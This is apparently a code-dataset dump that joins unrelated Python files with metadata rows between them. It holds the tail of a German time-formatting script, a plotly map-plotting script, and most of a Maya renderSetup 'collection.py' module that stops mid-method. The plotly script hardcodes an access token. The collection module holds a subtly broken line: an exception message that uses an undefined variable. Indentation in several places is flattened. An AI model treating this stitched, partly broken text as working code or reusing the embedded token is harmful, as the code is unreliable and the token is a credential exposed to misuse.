if math.floor((((((g * 24) % 24) * 60) % 60) * 60) % 60) == 1:
    s = " Sekunde"
else:
    s = " Sekunden"
print()
print("Wachstumszeit: ")
print(math.floor(g/360), y)
print(math.floor((g % 360)/30), m)
print(math.floor((g % 360) % 30), d)
print(math.floor(((g % 360) % 30) * 24) % 24, h)
print(math.floor((((((g % 360) % 30) * 24) % 24) * 60) % 60), mi)
print(math.floor((((((((g % 360) % 30) * 24) % 24) * 60) % 60) * 60) % 60), s)
# choose singular/plural "Jahr"/"Jahre" for the output
if math.floor(addtime(g, v) / 360) == 1:
    y = " Jahr"
else:
    y = " Jahre"
# choose singular/plural "Monat"/"Monate" for the output
if math.floor(addtime(g, v) % 360) == 30:
    m = " Monat"
else:
    m = " Monate"
# choose singular/plural "Tag"/"Tage" for the output
if v == 1 or math.floor(addtime(g, v) % 30) == 1:
    d = " Tag"
else:
    d = " Tage"
# choose singular/plural "Stunde"/"Stunden" for the output
if math.floor((addtime(g, v) * 24) % 24) == 1:
    h = " Stunde"
else:
    h = " Stunden"
# choose singular/plural "Minute"/"Minuten" for the output
if math.floor((((addtime(g, v) * 24) % 24) * 60) % 60) == 1:
    mi = " Minute"
else:
    mi = " Minuten"
# choose singular/plural "Sekunde"/"Sekunden" for the output
if math.floor((((((addtime(g, v) * 24) % 24) * 60) % 60) * 60) % 60) == 1:
    s = " Sekunde"
else:
    s = " Sekunden"
print()
print("Bedenkzeit: ")
print(math.floor(addtime(g, v)/360), y)
print(math.floor((addtime(g, v) % 360)/30), m)
print(math.floor((addtime(g, v) % 360) % 30), d)
print(math.floor(((addtime(g, v) % 360) % 30) * 24) % 24, h)
print(math.floor((((((addtime(g, v) % 360) % 30) * 24) % 24) * 60) % 60), mi)
print(math.floor((((((((addtime(g, v) % 360) % 30) * 24) % 24) * 60) % 60) * 60) % 60), s)
# choose singular/plural "Jahr"/"Jahre" for the output
if math.floor((addtime(g, v) + g) / 360) == 1:
    y = " Jahr"
else:
    y = " Jahre"
# choose singular/plural "Monat"/"Monate" for the output
if math.floor((addtime(g, v) + g) % 360) == 30:
    m = " Monat"
else:
    m = " Monate"
# choose singular/plural "Tag"/"Tage" for the output
if v == 1 or math.floor((addtime(g, v) + g) % 30) == 1:
    d = " Tag"
else:
    d = " Tage"
# choose singular/plural "Stunde"/"Stunden" for the output
if math.floor(((addtime(g, v) + g) * 24) % 24) == 1:
    h = " Stunde"
else:
    h = " Stunden"
# choose singular/plural "Minute"/"Minuten" for the output
if math.floor(((((addtime(g, v) + g) * 24) % 24) * 60) % 60) == 1:
    mi = " Minute"
else:
    mi = " Minuten"
# choose singular/plural "Sekunde"/"Sekunden" for the output
if math.floor(((((((addtime(g, v) + g) * 24) % 24) * 60) % 60) * 60) % 60) == 1:
    s = " Sekunde"
else:
    s = " Sekunden"
print()
print("Gesamtzeit: ")
print(math.floor((g + addtime(g, v))/360), y)
print(math.floor(((g + addtime(g, v)) % 360)/30), m)
print(math.floor(((g + addtime(g, v)) % 360) % 30), d)
print(math.floor((((g + addtime(g, v)) % 360) % 30) * 24) % 24, h)
print(math.floor(((((((g + addtime(g, v)) % 360) % 30) * 24) % 24) * 60) % 60), mi)
print(math.floor(((((((((g + addtime(g, v)) % 360) % 30) * 24) % 24) * 60) % 60) * 60) % 60), s)
| [
"[email protected]"
] | |
5636c3dd3742788051538088505928e3ef3fe2fb | 2fa6156bcb1935b0a4897d1e6229cd0f73714130 | /gs_runplots.py | 3b59643b8e739ca1d34634703efd923eeb25c836 | [
"MIT"
] | permissive | briangalindoherbert/gs_mapdemo | 9fdaed1196452d438af3573ecb74632bb9930460 | 86f1791e8a8913335a24ea32ae10d16a86dfa415 | refs/heads/main | 2023-02-04T15:53:41.548014 | 2020-12-15T21:14:04 | 2020-12-15T21:14:04 | 314,715,162 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,036 | py | # encoding=utf-8
"""
this is a script to separate the running of plots on processed data from the import, wrangling, and calc work
done in gs_mapdemo.py. Because I do a lot of customization on the plotting end that reuses the same DataFrames,
I don't need to redo that processing just to test out minor plotting changes.
"""
import pandas as pd
from plotly.io import renderers
from gs_dochoro import *
runcounty = True
runnyt = False
runstate = True
renderers.default = 'browser'
pd.options.plotting.backend = 'plotly'
pd.set_option('precision',7)
pd.set_option('display.float_format','{:.2f}'.format)
plotly_token = 'pk.eyJ1IjoiYmdoZXJiZXJ0IiwiYSI6ImNrYXl2MmFhYjBncHEyc3Bpa2ozczQwdGgifQ.glPFF4kjwrhP40bncFSnZA'
if runcounty:
# go_cty = do_countyplot(df, updated)
go_cty = do_casesplot(df, date_jhu)
go_ctymort = do_countyplot(df, date_jhu)
go_cty.show()
go_ctymort.show()
if runnyt:
df_nyt1 = do_countystats(df_nyt)
go_nyt = do_nytcounty(df_nyt1, date_nyt)
go_nyt.show()
if runstate:
go_obj = do_stateplot(df_st, date_jhus)
go_obj.show()
| [
"[email protected]"
] | |
52bc7632cb2fb0f992aefdbbb894875a1607ea42 | 508321d683975b2339e5292202f3b7a51bfbe22d | /Userset.vim/ftplugin/python/CompletePack/maya/app/renderSetup/model/collection.py | 6f5c78e3c5ec754621968564b253a3121787e876 | [] | no_license | cundesi/vimSetSa | 4947d97bcfe89e27fd2727423112bb37aac402e2 | 0d3f9e5724b471ab21aa1199cc3b4676e30f8aab | refs/heads/master | 2020-03-28T05:54:44.721896 | 2018-08-31T07:23:41 | 2018-08-31T07:23:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54,254 | py | """Collection node class and utility functions.
This module provides the collection class, as well as utility
functions to operate on collections.
The collection owns its associated selector node: on collection
delete, the selector is deleted as well.
Conceptually, a collection fulfills four roles in render setup:
1) It is a container of overrides. If enabled, the collection will
apply all its enabled overrides on nodes it selects (see (2)).
2) It selects nodes onto which overrides will be applied. These nodes
can be DAG or DG nodes.
3) It is a container of child collections. Child collections always
select nodes based on their parent's selected nodes (see (2)).
4) It defines render layer membership. Members of a render layer can
only be DAG nodes. These are always a subset of the nodes selected
by the collection (see (2)). The members of the render layer are the
union of the top-level collection members; children collections can
exclude or re-include members. See RenderLayer.getMembers for more
details (including the effect of isolate select mode).
The application of overrides only obeys enabled / disabled status.
Render layer membership is determined from enabled / disabled, in
conjunction with isolate select."""
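# A minimal usage sketch (hypothetical node and attribute names; the collection
# must be parented under a render setup layer for its overrides to take effect):
#
#   import maya.app.renderSetup.model.collection as collection
#   col = collection.create('myCollection')       # also creates the selector node
#   col.getSelector().setPattern('pSphere*')      # role (2): select nodes
#   over = col.createAbsoluteOverride('pSphere1', 'translateX')   # role (1)
#   col.setSelfEnabled(True)                      # overrides apply while enabled
#   collection.delete(col)                        # removes children and the selector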
import maya
maya.utils.loadStringResourcesForModule(__name__)
import re
import maya.cmds as cmds
import maya.api.OpenMaya as OpenMaya
import maya.app.renderSetup.model.nodeList as nodeList
import maya.app.renderSetup.model.utils as utils
import maya.app.renderSetup.model.plug as plug
import maya.app.renderSetup.model.typeIDs as typeIDs
import maya.app.renderSetup.model.selector as selector
import maya.app.renderSetup.model.undo as undo
import maya.app.renderSetup.model.override as override
import maya.app.renderSetup.model.overrideUtils as overrideUtils
import maya.app.renderSetup.model.childNode as childNode
import maya.app.renderSetup.model.enabled as computeEnabled
import maya.app.renderSetup.model.namespace as namespace
import maya.app.renderSetup.model.renderSettings as renderSettings
import maya.app.renderSetup.model.rendererCallbacks as rendererCallbacks
import maya.app.renderSetup.model.traverse as traverse
from maya.app.renderSetup.model.renderLayerSwitchObservable import RenderLayerSwitchObservable
import maya.app.renderSetup.model.clipboardData as clipboardData
import maya.app.renderSetup.common.utils as commonUtils
import maya.app.renderSetup.common.profiler as profiler
import maya.app.renderSetup.common.guard as guard
import maya.app.renderSetup.model.context as context
import maya.app.renderSetup.model.jsonTranslatorUtils as jsonTranslatorUtils
import maya.app.renderSetup.model.jsonTranslatorGlobals as jsonTranslatorGlobals
# List all error messages below
kInvalidChildName = maya.stringTable['y_collection.kInvalidChildName' ]
kUnknownChild = maya.stringTable['y_collection.kUnknownChild' ]
kOverrideCreationFailed = maya.stringTable['y_collection.kOverrideCreationFailed' ]
kCollectionMissingSelector = maya.stringTable['y_collection.kCollectionMissingSelector' ]
kRendererMismatch = maya.stringTable['y_collection.kRendererMismatch' ]
kIncorrectChildType = maya.stringTable['y_collection.kIncorrectChildType' ]
# List of undo messages
kChildAttached = maya.stringTable['y_collection.kChildAttached' ]
kChildDetached = maya.stringTable['y_collection.kChildDetached' ]
kSet = maya.stringTable['y_collection.kSet' ]
def collections(c):
return c.getCollections()
class Collection(nodeList.ListBase, childNode.TreeOrderedItem,
childNode.ChildNode):
"""
Collection node.
A collection has an ordered list of children, and a selector to
determine nodes to which the children apply.
MAYA-59277:
- When we start implementing proper hierarchical collections we
need to decide on the relationship between parent and child
selectors. Do we always consider a parent collection to be the
union of its child collections, and propagate the selector
information upwards when a child collection is added or changed?
Or do we go the opposite direction and restrict the child collection
to use the intersection between its selector and its parent's selector?
- Light child collections always have a single light source member.
We should utilize this and create a specific selector for such
use cases for better performance.
"""
kTypeId = typeIDs.collection
kTypeName = 'collection'
# Attributes for collection as list of children.
#
# Connections to lowest-priority and highest-priority child
# on children linked list. The lowest-priority child
# is considered to be the front of the list, and the highest-priority
# child the back of the list.
childLowest = OpenMaya.MObject()
childHighest = OpenMaya.MObject()
# Connection to all children in the list.
children = OpenMaya.MObject()
# Attribute for message connection to selector node associated with the
# collection. This attribute is a destination, as only one selector
# can be associated with each collection.
aSelector = OpenMaya.MObject()
# Enabled behavior. See enabled module for documentation.
enabled = OpenMaya.MObject()
selfEnabled = OpenMaya.MObject()
parentEnabled = OpenMaya.MObject()
# isolateSelected flag as attribute
isolateSelected = OpenMaya.MObject()
# The number of isolate selected children in a collection's subtree.
numIsolatedChildren = OpenMaya.MObject()
# The number of isolate selected ancestors of this collection.
numIsolatedAncestors = OpenMaya.MObject()
# the SimpleSelector is the default.
kDefaultSelectorTypeName = selector.SimpleSelector.kTypeName
@staticmethod
def creator():
return Collection()
@staticmethod
def initializer():
# A collection is a render layer list element.
# inheritAttributesFrom() must be called before adding any other
# attributes.
Collection.inheritAttributesFrom(nodeList.ListItem.kTypeName)
# A collection is a list of children.
Collection.children = Collection.initListItems()
Collection.childLowest = utils.createDstMsgAttr(
'childLowest', 'cl')
Collection.addAttribute(Collection.childLowest)
Collection.childHighest = utils.createDstMsgAttr(
'childHighest', 'ch')
Collection.addAttribute(Collection.childHighest)
Collection.aSelector = utils.createDstMsgAttr('selector', 'sel')
Collection.addAttribute(Collection.aSelector)
# Set up enabled attribute.
computeEnabled.initializeAttributes(Collection)
# Add isolateSelected attribute
Collection.numIsolatedChildren = computeEnabled.createNumIsolatedChildrenAttribute()
Collection.addAttribute(Collection.numIsolatedChildren)
Collection.numIsolatedAncestors = computeEnabled.createHiddenIntAttribute(
"numIsolatedAncestors", "nia")
Collection.addAttribute(Collection.numIsolatedAncestors)
# Add isolateSelected attribute
numAttrFn = OpenMaya.MFnNumericAttribute()
Collection.isolateSelected = numAttrFn.create("isolateSelected", "is", OpenMaya.MFnNumericData.kBoolean, 0)
numAttrFn.storable = True
numAttrFn.keyable = False
numAttrFn.readable = True
numAttrFn.writable = True
numAttrFn.hidden = True
OpenMaya.MPxNode.addAttribute(Collection.isolateSelected)
Collection.attributeAffects(Collection.numIsolatedChildren, Collection.enabled)
Collection.attributeAffects(Collection.numIsolatedAncestors, Collection.enabled)
Collection.attributeAffects(Collection.isolateSelected, Collection.enabled)
def __init__(self):
super(Collection, self).__init__()
self._enabledDirty = False
self._callbackIds = []
def postConstructor(self):
# Call parent class postConstructor
super(Collection, self).postConstructor()
# Listen to changes in the enabled attribute.
self._callbackIds = computeEnabled.addChangeCallbacks(self)
def typeId(self):
return Collection.kTypeId
def typeName(self):
return Collection.kTypeName
def _createSelector(self, parent=None, selArgs=None):
"""Create a selector node, and attach it to the collection.
parent is an optional parent collection. This method must be
overridden by derived classes."""
self.setSelectorType(parent.getSelector().kTypeName if parent else \
self.kDefaultSelectorTypeName)
if parent:
self.getSelector().minimalClone(parent.getSelector())
def _createAndConnectSelector(self, typeName, selArgs=None):
"""Engine method for _createSelector.
selArgs is an optional dictionary passed to _createSelectorNode."""
newSelector = self._createSelectorNode(
typeName, self.name()+'Selector', selArgs)
cmds.connectAttr(newSelector + '.c', self.name() + '.selector')
def _createSelectorNode(self, typeName, selectorName, selArgs):
"""Create the selector node.
Can be overridden by derived classes."""
return cmds.createNode(typeName, name=selectorName, skipSelect=True)
def getSelectorType(self):
try: return self.getSelector().kTypeName
except: return None
def setSelectorType(self, typeName):
'''Sets the selector type of this collection.'''
if self.getSelectorType() == typeName:
return
with undo.NotifyCtxMgr("Set selector type", self._selectorChanged):
children = [child for child in self.getChildren() if isinstance(child, Collection)]
# need to disconnect all selector children
# otherwise they get deleted along with their parent selector
for child in children:
child.getSelector().setParent(None)
try: self._deleteSelector()
except: pass
self._createAndConnectSelector(typeName)
parent = self.parent()
selector = self.getSelector()
if isinstance(parent, Collection):
selector.setParent(parent.getSelector())
for child in children:
child.getSelector().setParent(selector)
def _deleteSelector(self):
selector = self.getSelector()
cmds.disconnectAttr(selector.name() + '.c', self.name() + '.selector')
utils.deleteNode(selector)
def _getInputAttr(self, attr, dataBlock=None):
return dataBlock.inputValue(attr) if dataBlock else OpenMaya.MPlug(self.thisMObject(), attr)
def _getSelfEnabledPlug(self):
return OpenMaya.MPlug(self.thisMObject(), Collection.selfEnabled)
def _getIsolatePlug(self):
return OpenMaya.MPlug(self.thisMObject(), Collection.isolateSelected)
def hasIsolatedAncestors(self, dataBlock=None):
return self._getInputAttr(self.numIsolatedAncestors, dataBlock).asInt() > 0
def hasIsolatedChildren(self, dataBlock=None):
return self._getInputAttr(self.numIsolatedChildren, dataBlock).asInt() > 0
def compute(self, plug, dataBlock):
if plug == self.enabled:
# We are enabled if:
#
# o The normal enabled computation is true (self enabled is true AND
# parent enabled is true).
#
# AND
#
# o We're in batch mode OR
# o No node is isolated OR
# o This node is isolated OR
# o This node has isolate selected children OR
# o This node has isolate selected ancestors.
#
value = computeEnabled.computeEnabled(self, dataBlock) and \
(cmds.about(batch=True) or \
dataBlock.inputValue(self.layerNumIsolatedChildren).asInt()==0 or \
self.isIsolateSelected(dataBlock) or \
self.hasIsolatedAncestors(dataBlock) or \
self.hasIsolatedChildren(dataBlock))
computeEnabled.setEnabledOutput(self, dataBlock, value)
def enabledChanged(self):
layer = self.getRenderLayer()
if layer:
layer._enabledChanged(self)
self.itemChanged()
def isEnabled(self, dataBlock=None):
return self._getInputAttr(self.enabled, dataBlock).asBool()
def isSelfEnabled(self, dataBlock=None):
return self._getInputAttr(self.selfEnabled, dataBlock).asBool()
def setSelfEnabled(self, value):
if value != self.isSelfEnabled():
# pulling isEnabled will trigger enabledChanged
# (no matter if enable output value has changed or not)
with undo.NotifyCtxMgr("Set Override Enabled",self.isEnabled):
cmds.setAttr(self.name()+".selfEnabled", 1 if value else 0)
@guard.state(computeEnabled.isPulling, computeEnabled.setPulling, True)
def pullEnabled(self):
# This will force pulling the enabled plug on overrides. It solves
# the problem of connection overrides not being applied / unapplied
# when not visible in the RenderSetup window; being visible in the
# RenderSetup window causes enabled to be pulled.
#
# Connection overrides are not part of the network; they are a
# procedure that must be run on enable change to modify the
# network. Therefore, the enabled plug is not pulled, contrary to
# value overrides that get inserted in the network, and thus we
# need to force the plug to be pulled.
# Two phase procedure to avoid DG cycle check warnings. First,
# pull on enabled output of connection overrides.
needsUpdate = set()
for n in traverse.depthFirst(self, traverse.nodeListChildren):
if isinstance(n, override.Override) and n.updateOnEnabledChanged():
# Call isEnabled to force computation of the enabled output.
n.isEnabled()
needsUpdate.add(n)
# Second, update the connection override. This will iterate over
# the connection override apply nodes, which query the connection
# override enabled state we've finished computing above. Had we
# done the override enabled computation and the update in the same
# call, we would have gotten a DG evaluation cycle (compute
# enabled, cause update, which queries enabled).
for o in needsUpdate:
o.update()
def getRenderLayer(self):
# For hierarchical collections the parent
# could be another collection, otherwise
# the parent is always the render layer
parent = self.parent()
if isinstance(parent, Collection):
return parent.getRenderLayer()
return parent
def isolateSelectedChanged(self):
layer = self.getRenderLayer()
if layer:
layer._isolateSelectedChanged(self)
def isIsolateSelected(self, dataBlock=None):
""" Get if isolate selected. Will always return False in batch mode """
return False if cmds.about(batch=True) else self._getInputAttr(self.isolateSelected, dataBlock).asBool()
def setIsolateSelected(self, val):
if val!=self.isIsolateSelected() and not cmds.about(batch=True):
with undo.NotifyCtxMgr(kSet % (self.name(), 'isolateSelected', val), self.isolateSelectedChanged):
# Use a command to support the undo mechanism
cmds.setAttr(self._getIsolatePlug().name(), val)
self._updateIsolateSelected(1 if val else -1)
def _findSubcollectionForType(self, typeName):
'''Finds the subcollection of this collection that will handle that typeName
or creates it and returns it if it doesn't exist.'''
filterType, customFilter = selector.Filters.getFiltersFor(typeName)
def predicate(child):
if not isinstance(child, Collection):
return False
sel = child.getSelector()
return sel.kTypeName == selector.SimpleSelector.kTypeName and \
sel.getPattern() == "*" and \
len(sel.staticSelection) == 0 and \
sel.getFilterType() == filterType and \
(filterType != selector.Filters.kCustom or sel.getCustomFilterValue() == customFilter)
def creator():
name = self.name() + "_" + selector.Filters.names.get(filterType, customFilter)
col = create(name)
col.setSelectorType(selector.SimpleSelector.kTypeName)
sel = col.getSelector()
sel.setPattern('*')
sel.setFilterType(filterType)
sel.setCustomFilterValue(customFilter)
return col
return self.findChild(predicate, creator)
@undo.chunk('Create and append an override')
def createOverride(self, overrideName, overrideType):
""" Add an override to the Collection using its node type id or type name."""
# Note: No need to propagate the change notification
# as an empty override does not affect the collection
over = override.create(overrideName, overrideType)
if not over:
raise Exception(kOverrideCreationFailed % overrideName)
# special handle for shader override as they apply to shading engines
# => create subcollection of shading engines if we're in a dag only collection
from maya.app.renderSetup.model.connectionOverride import ShaderOverride
if over.typeId() != typeIDs.shaderOverride or \
self.getSelector().acceptsType('shadingEngine'):
self.appendChild(over)
else:
self._findSubcollectionForType('shadingEngine').appendChild(over)
return over
def _getOverrideType(self, plg, overrideType):
'''Returns the override type that should be created for the given
plg in the given collection (self). Overrides that can't be relative will become absolute.'''
return plg.overrideType(overrideType)
@undo.chunk('Create and append an override')
def _createOverride(self, plg, overrideType):
over = override.create(plg.attributeName, self._getOverrideType(plg, overrideType))
if not over:
            raise Exception(kOverrideCreationFailed % plg.attributeName)
over.finalize(plg.name)
typeName = OpenMaya.MFnDependencyNode(plg.node()).typeName
collection = self if self.getSelector().acceptsType(typeName) else \
self._findSubcollectionForType(typeName)
collection.appendChild(over)
return over
@undo.chunk('Create and append an absolute override')
def createAbsoluteOverride(self, nodeName, attrName):
""" Add an absolute override to a collection """
return self._createOverride(plug.Plug(nodeName,attrName), typeIDs.absOverride)
@undo.chunk('Create and append a relative override')
def createRelativeOverride(self, nodeName, attrName):
""" Add a relative override to a collection """
return self._createOverride(plug.Plug(nodeName,attrName), typeIDs.relOverride)
@undo.chunk('Create and append a child collection')
def _createCollection(self, collectionName, typeName):
col = create(collectionName, typeName, parent=self)
self.appendChild(col)
return col
def createCollection(self, collectionName):
""" Add a child collection to the Collection. """
return self._createCollection(collectionName, Collection.kTypeName)
def _childAttached(self, child):
'''Perform work to attach a child.
The child has already been added to collection's list when this
method is called.'''
with undo.NotifyCtxMgr(kChildAttached % (self.name(), child.name()), self.itemChanged):
# Once inserted, hook up the child's parentEnabled input to our
# enabled output. Use existing command for undo / redo purposes.
cmds.connectAttr(self.name() + '.enabled',
child.name() + '.parentEnabled')
if isinstance(child, Collection):
child.getSelector().setParent(self.getSelector())
child._attach(self.getRenderLayer())
layer = self.getRenderLayer()
if layer:
layer.descendantAdded(child)
def _detachChild(self, child):
'''Perform work to detach a child.
The child has not yet been removed from the collection's list when
this method is called.'''
with undo.NotifyCtxMgr(kChildDetached % (self.name(), child.name()), self.itemChanged):
# Disconnect the child's parentEnabled input from our enabled
# output. Use existing command for undo / redo purposes.
childParentEnabled = child.name() + '.parentEnabled'
cmds.disconnectAttr(self.name() + '.enabled', childParentEnabled)
# Child parentEnabled will retain its last value, so set it
# to True in case the collection gets parented to the render layer.
cmds.setAttr(childParentEnabled, 1)
if isinstance(child, Collection):
child.getSelector().setParent(None)
child._detach(self.getRenderLayer())
def _attach(self, layer):
"""Attach this collection."""
self._connectLayerIsolatedChildren(layer)
# Number of isolated children doesn't change when we attach.
# Update isolated children of our ancestors.
self._updateAncestorsIsolatedChildren(
self.getNumIsolatedChildren(includeSelf=True))
# Update isolated ancestors of ourselves and our children.
self._updateChildrenIsolatedAncestors(
self.getNumIsolatedAncestors(), includeSelf=True)
def _detach(self, layer):
"""Detach this collection."""
self._disconnectLayerIsolatedChildren(layer)
# Number of isolated children doesn't change when we detach.
# Update isolated children of our ancestors.
self._updateAncestorsIsolatedChildren(
-self.getNumIsolatedChildren(includeSelf=True))
# Update isolated ancestors of ourselves and our children.
self._updateChildrenIsolatedAncestors(
-self.getNumIsolatedAncestors(), includeSelf=True)
@undo.chunk('Append to collection')
def appendChild(self, child):
""" Add a child as the highest-priority child."""
if child.typeId()==RenderSettingsCollection.kTypeId \
or child.typeId()==LightsCollection.kTypeId:
raise RuntimeError(kIncorrectChildType % child.typeName())
nodeList.append(self, child)
self._childAttached(child)
@undo.chunk('Attach to collection')
def attachChild(self, pos, child):
""" Attach a child at a specific position. """
if child.typeId()==RenderSettingsCollection.kTypeId \
or child.typeId()==LightsCollection.kTypeId:
raise RuntimeError(kIncorrectChildType % child.typeName())
nodeList.insert(self, pos, child)
self._childAttached(child)
@undo.chunk('Detach from collection')
def detachChild(self, child):
""" Detach a child whatever its position. """
unapply(child) # NoOp if not applied; otherwise commands are used
# Must perform detach operations before removing from list,
# otherwise parenting information is gone.
self._detachChild(child)
nodeList.remove(self, child)
def getChildren(self, cls=childNode.ChildNode):
""" Get the list of all children.
Optionally only the children matching the given class. """
return list(nodeList.forwardListNodeClassGenerator(self, cls))
def hasChildren(self):
return self.findChild(lambda child: True) is not None
def getCollections(self):
return self.getChildren(cls=Collection)
def getCollectionByName(self, collectionName, nested=False):
for collection in nodeList.forwardListNodeClassGenerator(self, cls=Collection):
if collection.name() == collectionName:
return collection
elif nested:
collection2 = collection.getCollectionByName(collectionName, True)
if collection2:
return collection2
return None
def findChild(self, predicate, creator=None):
'''Find the child of this collection satisfying the predicate function or creates it
with the creator function if not found and a creator function is specified.
Function signatures are:
predicate(childNode): returns boolean.
creator(void) : returns the created node.'''
for child in nodeList.forwardListNodeClassGenerator(self, childNode.ChildNode):
if predicate(child):
return child
if not creator:
return None
child = creator()
self.appendChild(child)
return child
def getChild(self, childName, cls=childNode.ChildNode):
""" Look for an existing child by name and optionally class.
@type childName: string
@param childName: Name of child to look for
@type cls: class name
@param cls: Class name for the type of class to look for
@rtype: Child model instance
@return: Found instance or throw an exception
"""
if not childName:
raise Exception(kInvalidChildName)
for child in nodeList.forwardListNodeClassGenerator(self, cls):
if child.name() == childName:
return child
raise Exception(kUnknownChild % (childName, self.name()))
def isAbstractClass(self):
# Override method inherited from base class: not an abstract class.
return False
def getSelector(self):
"""Return the selector user node for this collection."""
selector = utils.getSrcUserNode(
utils.findPlug(self, Collection.aSelector))
if (selector is None):
raise Exception(kCollectionMissingSelector % self.name())
return selector
@context.applyCollection
def apply(self):
""" Apply all children in this collection. """
with profiler.ProfilerMgr('Collection::apply'):
# Apply all our children to the selection
for child in nodeList.forwardListGenerator(self):
child.apply()
# UI Feedback (progressBar)
RenderLayerSwitchObservable.getInstance().notifyRenderLayerSwitchObserver()
@context.applyCollection
def postApply(self):
'''Post applies all children in this collection. This function may be called to apply a collection (with contained overrides)
after the layer was set visible. It allows inserting new overrides in the currently visible layer
without the need to toggle visibility.'''
with profiler.ProfilerMgr('Collection::postApply'):
# Post apply all our children
for child in nodeList.forwardListGenerator(self):
child.postApply()
@context.unapplyCollection
def unapply(self):
"""Unapply all children in this collection."""
with profiler.ProfilerMgr('Collection::unapply'):
for child in nodeList.reverseListGenerator(self):
child.unapply()
# UI Feedback (progressBar)
RenderLayerSwitchObservable.getInstance().notifyRenderLayerSwitchObserver()
def getOverrides(self):
return self.getChildren(cls=override.Override)
# Collection interface as list of children.
# These methods implement the list requirements for the nodeList module.
#
# The list front and back are destination plugs connected to the child
# node's message plug (which is a source).
def _getFrontAttr(self):
return Collection.childLowest
def _getBackAttr(self):
return Collection.childHighest
def _getListItemsAttr(self):
return Collection.children
def _preChildDelete(self, child):
# Private interface for child to inform its parent that it is
# about to be deleted. Remove the child from our list.
self.detachChild(child)
def _selectedNodesChanged(self):
""" Ownership of this collection or one of its children changed """
layer = self.getRenderLayer()
if layer:
layer._selectedNodesChanged(self)
self.itemChanged()
def _selectorChanged(self):
"""Selector of this collection changed.
Identical to _selectedNodesChanged(), except that the itemChanged()
notification is given with selectorChanged=True."""
layer = self.getRenderLayer()
if layer:
layer._selectedNodesChanged(self)
self.itemChanged(selectorChanged=True)
def _refreshRendering(self):
''' Some changes impose to refresh the rendering for the visible layer only. '''
parent = self.parent()
if parent:
parent._refreshRendering()
def getLayerNumIsolatedChildren(self):
return OpenMaya.MPlug(
self.thisMObject(), Collection.layerNumIsolatedChildren).asInt()
def _getNumIsolatedChildrenPlug(self):
return OpenMaya.MPlug(self.thisMObject(), Collection.numIsolatedChildren)
def getNumIsolatedChildren(self, includeSelf=False):
nic = self._getNumIsolatedChildrenPlug().asInt()
if includeSelf and self.isIsolateSelected():
nic += 1
return nic
def _getNumIsolatedAncestorsPlug(self):
return OpenMaya.MPlug(self.thisMObject(), Collection.numIsolatedAncestors)
def getNumIsolatedAncestors(self):
return self._getNumIsolatedAncestorsPlug().asInt()
# See comments in RenderLayer._updateIsolateSelected.
def _updateNumIsolatedChildren(self, val):
# Use a command to support the undo mechanism
if val != 0:
newVal = self.getNumIsolatedChildren() + val
cmds.setAttr(self._getNumIsolatedChildrenPlug().name(), newVal)
def _updateNumIsolatedAncestors(self, val):
# Use a command to support the undo mechanism
if val != 0:
newVal = self.getNumIsolatedAncestors() + val
cmds.setAttr(self._getNumIsolatedAncestorsPlug().name(), newVal)
def _updateIsolateSelected(self, val):
self._updateAncestorsIsolatedChildren(val)
self._updateChildrenIsolatedAncestors(val)
def _updateAncestorsIsolatedChildren(self, val):
layer = self.getRenderLayer()
if layer:
layer._updateIsolateSelected(val)
for c in self.ancestorCollections():
c._updateNumIsolatedChildren(val)
def _updateChildrenIsolatedAncestors(self, val, includeSelf=False):
# Tell descendants there has been a change in their ancestors'
# isolate select.
for c in traverse.depthFirst(self, collections):
if c is self and not includeSelf:
continue
c._updateNumIsolatedAncestors(val)
def _connectLayerIsolatedChildren(self, layer):
# Connect subtree to layer's isolated children attribute.
if layer:
for c in traverse.depthFirst(self, collections):
c._connectSelfLayerIsolatedChildren(layer)
def _disconnectLayerIsolatedChildren(self, layer):
# Disconnect subtree from layer's isolated children attribute.
if layer:
for c in traverse.depthFirst(self, collections):
c._disconnectSelfLayerIsolatedChildren(layer)
def _connectSelfLayerIsolatedChildren(self, layer):
if layer:
# Use existing command for undo / redo purposes.
cmds.connectAttr(layer.name() + '.numIsolatedChildren',
self.name() + '.parentNumIsolatedChildren')
def _disconnectSelfLayerIsolatedChildren(self, layer):
if layer:
# Use existing command for undo / redo purposes.
cmds.disconnectAttr(layer.name() + '.numIsolatedChildren',
self.name() + '.parentNumIsolatedChildren')
def _importChild(self, childName, nodeType, selArgs=None):
name = cmds.createNode(nodeType, name=childName, skipSelect=True)
child = utils.nameToUserNode(name)
if isinstance(child, Collection):
child._createSelector(None, selArgs)
self.appendChild(child)
return child
def activate(self):
'''
Called when this list item is inserted into the list.
Override this method to do any scene specific initialization.
'''
if len(self._callbackIds) == 0:
self._callbackIds = computeEnabled.addChangeCallbacks(self)
self.getSelector().activate()
def deactivate(self):
'''
Called when this list item is removed from the list.
Override this method to do any scene specific teardown.
'''
# Remove all callbacks.
OpenMaya.MMessage.removeCallbacks(self._callbackIds)
self._callbackIds = []
self.getSelector().deactivate()
def _encodeProperties(self, dict):
super(Collection, self)._encodeProperties(dict)
dict[self._getSelfEnabledPlug().partialName(useLongNames=True)] = self.isEnabled()
dict[self._getIsolatePlug().partialName(useLongNames=True)] = self.isIsolateSelected()
if self.getSelectorType() == selector.BasicSelector.kTypeName: # backward comp with 2016 R2
selectorDict = dict
else:
selectorDict = {}
dict[jsonTranslatorGlobals.SELECTOR_ATTRIBUTE_NAME] = { self.getSelectorType() : selectorDict }
self.getSelector()._encodeProperties(selectorDict)
dict[jsonTranslatorGlobals.CHILDREN_ATTRIBUTE_NAME] = jsonTranslatorUtils.encodeObjectArray(self.getChildren())
def _decodeChildren(self, children, mergeType, prependToName):
jsonTranslatorUtils.decodeObjectArray(children,
jsonTranslatorUtils.MergePolicy(self.getChild,
self._importChild,
mergeType,
prependToName))
def _decodeProperties(self, dict, mergeType, prependToName):
super(Collection, self)._decodeProperties(dict, mergeType, prependToName)
if self._getSelfEnabledPlug().partialName(useLongNames=True) in dict:
self.setSelfEnabled(dict[self._getSelfEnabledPlug().partialName(useLongNames=True)])
if self._getIsolatePlug().partialName(useLongNames=True) in dict:
self.setIsolateSelected(dict[self._getIsolatePlug().partialName(useLongNames=True)])
if jsonTranslatorGlobals.SELECTOR_ATTRIBUTE_NAME not in dict: # backward comp with 2016 R2
self.setSelectorType(selector.BasicSelector.kTypeName)
selectorProperties = dict
else:
selectorType = dict[jsonTranslatorGlobals.SELECTOR_ATTRIBUTE_NAME].keys()[0]
if self.getSelectorType() != selectorType:
self.setSelectorType(selectorType)
